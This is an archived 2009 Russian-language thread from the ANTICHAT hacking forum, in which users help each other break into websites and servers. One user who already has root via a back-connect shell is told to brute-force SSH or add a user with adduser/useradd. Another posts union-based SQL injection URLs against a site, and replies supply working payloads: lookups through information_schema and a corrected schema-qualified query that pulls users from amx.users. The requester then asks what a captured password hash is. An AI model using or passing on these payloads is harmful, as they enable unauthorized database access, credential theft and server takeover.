ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.12.2009, 21:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
Последний раз редактировалось Pashkela; 10.12.2009 в 21:37..
|
|
|
10.12.2009, 21:34
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
мб добавить юзера?
ззы
Pashkela,
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
а по-моему :
Получил рута через бэк-коннект...
уже как бы подразумевает,что у чела рут..не? |
|
|
|
10.12.2009, 21:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Pashkela
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
Я написал что права рута уже есть! Только через cmd, нада сделать чтобы смог подключится через пути (ssh)
Сообщение от $n@ke
мб добавить юзера?
как?
|
|
|
|
10.12.2009, 21:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 $n@ke:
да, я как всегда невмнимателен
|
|
|
|
10.12.2009, 21:41
|
|
Новичок
Регистрация: 05.10.2008
Сообщений: 8
Провел на форуме:
5899
Репутация:
0
|
|
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
|
|
|
|
10.12.2009, 21:45
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
2 .:[melkiy]:.
adduser
useradd
а вообще - http://ru-board.com/new/article.php?sid=112
|
|
|
|
10.12.2009, 21:57
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Сообщение от R@X
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
25+from+table.db
или
25+from+db.table
точно не помню , мне Пашкелла как то описывал способ этот, благодарен ему)
|
|
|
|
10.12.2009, 22:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
DeluxeS:
не неси бред, такой хрени я не мог писать:
select+table_schema+from+information_schema.tables +where+table_name='users'--
и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users--
где amx - имя БД, где хранится таблица users
ЗЫЖ Вот уродец, ниже еще один
|
|
|
|
10.12.2009, 22:00
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от R@X
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(schema_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.shemata--
перед users поставь базу через которую ета таблица работает, просто она там неодна...
ну типа db.user--
ЗЫЖ сам уродец...
Последний раз редактировалось 547; 10.12.2009 в 22:09..
|
|
|
|
10.12.2009, 22:21
|
|
Новичок
Регистрация: 05.10.2008
Сообщений: 8
Провел на форуме:
5899
Репутация:
0
|
|
спасибо парни помогли
еще вопрос что за хэш: *122FAB680F50DC0536FADEE85CB2974939BDD1A6
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1747418){kind=avatar}
Похожие темы
Линейный вид
